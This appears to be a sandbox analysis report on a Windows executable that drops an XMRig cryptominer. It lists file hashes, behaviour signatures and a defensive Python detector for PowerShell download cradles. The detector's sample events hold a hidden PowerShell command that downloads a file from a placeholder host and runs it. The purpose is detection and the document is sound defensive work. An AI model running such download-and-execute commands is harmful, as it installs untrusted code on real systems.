General

  • Target

    20dcc4229970dea713a3c7d63f8fd580_NeikiAnalytics.exe

  • Size

    3.3MB

  • Sample

    240527-gb9vvsag78

  • MD5

    20dcc4229970dea713a3c7d63f8fd580

  • SHA1

    4aaf8b80cdc628312e2c77898d35989750e121a7

  • SHA256

    d54c7bfbc1fc8eb836f23cd0488711ee056f1476bc0ef660bbd6187f3e210638

  • SHA512

    7b8b722c2ddc62f24abff9f4e85892b38bc7d6bc59a488f2d3997748a8389b9eea447670eab209a7310e127bfa2c75b55ba335b2c98c08af1408fd4fc0ff2620

  • SSDEEP

    98304:71ONtyBeSFkXV1etEKLlWUTOfeiRA2R76zHrW6:7bBeSFkW

Malware Config

Targets

    • Target

      20dcc4229970dea713a3c7d63f8fd580_NeikiAnalytics.exe

    • xmrig

      XMRig is a high-performance, open-source, cross-platform CPU/GPU miner. Its presence here means the sample delivers a cryptomining payload; the miner itself is a legitimate tool that is routinely bundled by malware.

    • XMRig Miner payload

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      PowerShell Invoke-WebRequest (a remote resource is fetched from a PowerShell command line).

    • Executes dropped EXE

    • Loads dropped DLL

    • UPX-packed file

      Detects executables packed with the open-source UPX packer or a modified variant of it.

    • Legitimate hosting services abused for malware hosting/C2
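
The PowerShell Invoke-WebRequest and "Executes dropped EXE" signatures above describe a process chain rather than a single artifact. The script below is an added example, not part of the sandbox report or its signature set: it runs two checks over constructed process-creation records (hypothetical PIDs, paths and URL, not taken from this analysis). The first flags PowerShell processes whose command line carries a download primitive; the second flags any executable launched by such a process from a user-writable drop directory.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (the fields a Sysmon Event ID 1 carries)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# PowerShell hosts, matched on the image file name only.
POWERSHELL_IMAGE = re.compile(r"(?i)(?:^|\\)(?:powershell|pwsh)\.exe$")

# Download-cradle indicators: Invoke-WebRequest and its alias, plus the other
# common .NET and BITS download primitives seen in one-liners.
DOWNLOAD_CRADLE = re.compile(
    r"(?i)\b(?:Invoke-WebRequest|iwr|Invoke-RestMethod|irm|"
    r"DownloadFile|DownloadString|Start-BitsTransfer)\b"
)

# User-writable locations where a freshly downloaded EXE usually lands.
DROP_DIR = re.compile(r"(?i)\\(?:AppData\\Local\\Temp|ProgramData|Users\\Public)\\")


def flag_download_cradles(events):
    """PIDs of PowerShell processes whose command line contains a download primitive."""
    return [e.pid for e in events
            if POWERSHELL_IMAGE.search(e.image) and DOWNLOAD_CRADLE.search(e.cmdline)]


def flag_dropped_exe_execution(events):
    """(parent_pid, child_pid) pairs where a flagged PowerShell process launched an
    executable out of a drop directory: the 'Executes dropped EXE' pattern."""
    cradles = set(flag_download_cradles(events))
    return [(e.ppid, e.pid) for e in events
            if e.ppid in cradles and DROP_DIR.search(e.image)]


# Constructed sample events (hypothetical lab paths and URL, not from the report).
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Users\lab\Desktop\sample.exe", "sample.exe"),
    ProcEvent(300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -w hidden -c "Invoke-WebRequest -Uri '
              'https://files.example.invalid/x.bin -OutFile $env:TEMP\\x.exe"'),
    ProcEvent(400, 300, r"C:\Users\lab\AppData\Local\Temp\x.exe", "x.exe"),
    ProcEvent(500, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe Get-Process"),
]

if __name__ == "__main__":
    print("download cradles:", flag_download_cradles(SAMPLE_EVENTS))      # [300]
    print("dropped EXE runs:", flag_dropped_exe_execution(SAMPLE_EVENTS))  # [(300, 400)]
```

The second check keys on the parent being a flagged cradle, so the benign PowerShell session (PID 500) and the sample launched from the desktop by explorer.exe are not reported; only the download-then-execute chain is.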

MITRE ATT&CK Enterprise v15

Tasks